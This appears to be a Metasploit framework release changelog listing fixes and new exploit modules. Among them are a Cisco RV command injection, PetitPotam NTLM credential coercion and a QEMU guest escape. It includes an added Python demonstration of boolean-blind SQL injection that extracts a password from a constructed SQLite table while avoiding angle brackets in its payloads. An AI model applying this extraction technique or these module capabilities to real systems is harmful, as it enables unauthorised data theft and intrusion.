
Feb 11, 2022

We updated our installers to better support hardened Linux installs.

Improved

  • PR 15994 - Updates Metasploit’s RPC functionality to support reading the result of external commands which have been executed in a console.

  • PR 16010 - This updates the zabbix_script_exec module with support for Zabbix version 5.0 and later. It also adds a new item-based execution technique and support for delivering Linux native payloads.

  • PR 16014 - This adds human readable long-form option names to various commands such as save/connect/search and more.

  • PR 16112 - This updates the PHP Meterpreter’s delete dir functionality to recursively delete directories, and adds validation to the getsystem command on Windows Meterpreter.

  • PR 16113 - A new NOP module, modules/nop/cmd/generic, has been added which supports adding NOPs to command line payloads using spaces for NOP characters.

  • PR 16132 - This enhances the MySQL injection library’s blind injection techniques. Generated payloads now avoid the characters < and > to improve compatibility with targets that filter or mangle them.

  • PR 16163 - Support has been added for the ClaimsPrincipal .NET deserialization gadget chain, which was found by jang. An exploit that utilizes this enhancement will arrive shortly.
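
The following is an added illustration of the blind-injection point in PR 16132 above; it is not Metasploit’s MySQL injection library and does not reproduce its code. It builds a constructed boolean-blind oracle on top of an in-memory SQLite database (the table, row and injection point are all made up for the example) and extracts a string with a binary search whose comparisons are expressed with BETWEEN, so no payload ever contains < or >. The SQLite function spellings (length, unicode, substr) are assumptions of this stand-in; on MySQL the equivalents are LENGTH(), ASCII() and SUBSTRING().

```python
import sqlite3


def make_oracle():
    """Constructed stand-in for a boolean-blind injection point.

    The attacker-controlled fragment is concatenated into the WHERE clause and
    the only signal available is whether a row comes back (True) or not (False).
    Returns the oracle and a list of every fragment it was sent, so the caller
    can audit exactly which characters went over the wire.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(name TEXT, pass TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cr3t')")  # constructed data
    sent = []

    def oracle(fragment: str) -> bool:
        sent.append(fragment)
        row = conn.execute(
            f"SELECT 1 FROM users WHERE name = 'admin' AND ({fragment})"
        ).fetchone()
        return row is not None

    return oracle, sent


def bsearch(oracle, expr: str, lo: int, hi: int) -> int:
    """Find the integer value of SQL expression `expr`, known to lie in [lo, hi].

    Each probe is `expr BETWEEN lo AND mid`, which is equivalent to `expr <= mid`
    given the invariant but never emits '<' or '>' in the payload.
    """
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"({expr}) BETWEEN {lo} AND {mid}"):
            hi = mid
        else:
            lo = mid + 1
    return lo


def extract(oracle, expr: str, max_len: int = 64) -> str:
    """Boolean-blind extraction of the string value of SQL expression `expr`.

    First recovers the length, then each character code (ASCII range assumed),
    using only BETWEEN-based probes. Function names are SQLite's because the
    oracle above is SQLite; on MySQL use LENGTH(), ASCII() and SUBSTRING().
    """
    length = bsearch(oracle, f"length({expr})", 0, max_len)
    chars = []
    for i in range(1, length + 1):
        code = bsearch(oracle, f"unicode(substr({expr}, {i}, 1))", 0, 127)
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    oracle, sent = make_oracle()
    secret = extract(oracle, "(SELECT pass FROM users WHERE name = 'admin')")
    print(secret, "recovered in", len(sent), "requests")
    print("payloads free of < and >:", all("<" not in p and ">" not in p for p in sent))
```

The request count is the same as a conventional `<`-based binary search (about seven probes per character plus the length search), so avoiding the angle brackets costs nothing in bandwidth; it only changes how the comparison is spelled.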

Fixed

  • Pro: We updated our installers to better support custom umask values on Linux installs.

  • PR 16025 - This fixes an issue with msfdb init on Windows when opting not to initialize web services.

  • PR 16066 - This fixes a bug where Meterpreter scripts did not correctly receive arguments passed via the sessions command. Note that Meterpreter scripts are deprecated and have been replaced with post modules.

  • PR 16109 - This fixes a crash in post/windows/gather/enum_domains when no domains are found.

  • PR 16114 - A bug in PayloadGenerator::prepend_nops meant that if no NOP modules existed for the target payload architecture, the payload was discarded and replaced with the array of NOP modules rendered as a string. This has now been fixed: if no NOP module exists for the target payload architecture, the raw shellcode is returned unmodified.

  • PR 16119 - This change fixes an incorrect user-agent in modules/auxiliary/dos/http/slowloris.py.

  • PR 16121 - This fixes an exception caused by exploits that call rhost() in Msf::Post::Common without a valid session.

  • PR 16123 - This fixes the missing full disclosure reference URL in the exploit/linux/http/cisco_ucs_rce module.

  • PR 16142 - This fixes an issue with Meterpreter’s getenv command. The getenv command now returns null when querying for a non-existing environment variable.

  • PR 16143 - This fixes an issue where a Cygwin SSH session was not correctly identified as a Windows device due to a case sensitivity issue.

  • PR 16147 - This fixes a bug where ssh_enumusers would only use one source in the generation of its user word list if both USERNAME and USER_FILE options were set. The module now pulls from all possible datastore options if they are set, including a new option DB_ALL_USERS.

  • PR 16160 - This fixes a crash when msfconsole is unable to correctly determine the hostname and current user within a shell prompt.

Modules

  • PR 16125 - This adds an ARCH_CMD target to an existing module so that it can now exploit GXV3140 models.

  • PR 16128 - This adds an exploit for various Cisco RV series VPNs / Routers for firmware versions 1.0.03.20 and below. The module exploits both an auth bypass vulnerability and command injection vulnerability to achieve unauthenticated code execution as the www-data user against vulnerable devices.

  • PR 16130 - This adds an exploit for CVE-2021-24862, an authenticated SQL injection vulnerability in the RegistrationMagic WordPress plugin.

  • PR 16136 - This adds a new auxiliary scanner module that ports the PetitPotam tool to Metasploit. The module leverages CVE-2021-36942 to coerce Windows hosts into authenticating to an attacker-specified host, which lets an attacker capture NTLM credentials for further actions such as NTLM relay attacks.

  • PR 16151 - This adds a module that exploits an exposed QEMU HMP (human monitor) service to execute OS commands on the host running QEMU. Where the HMP TCP service is reachable from an emulated guest, the same issue can be used to escape the guest onto the host.
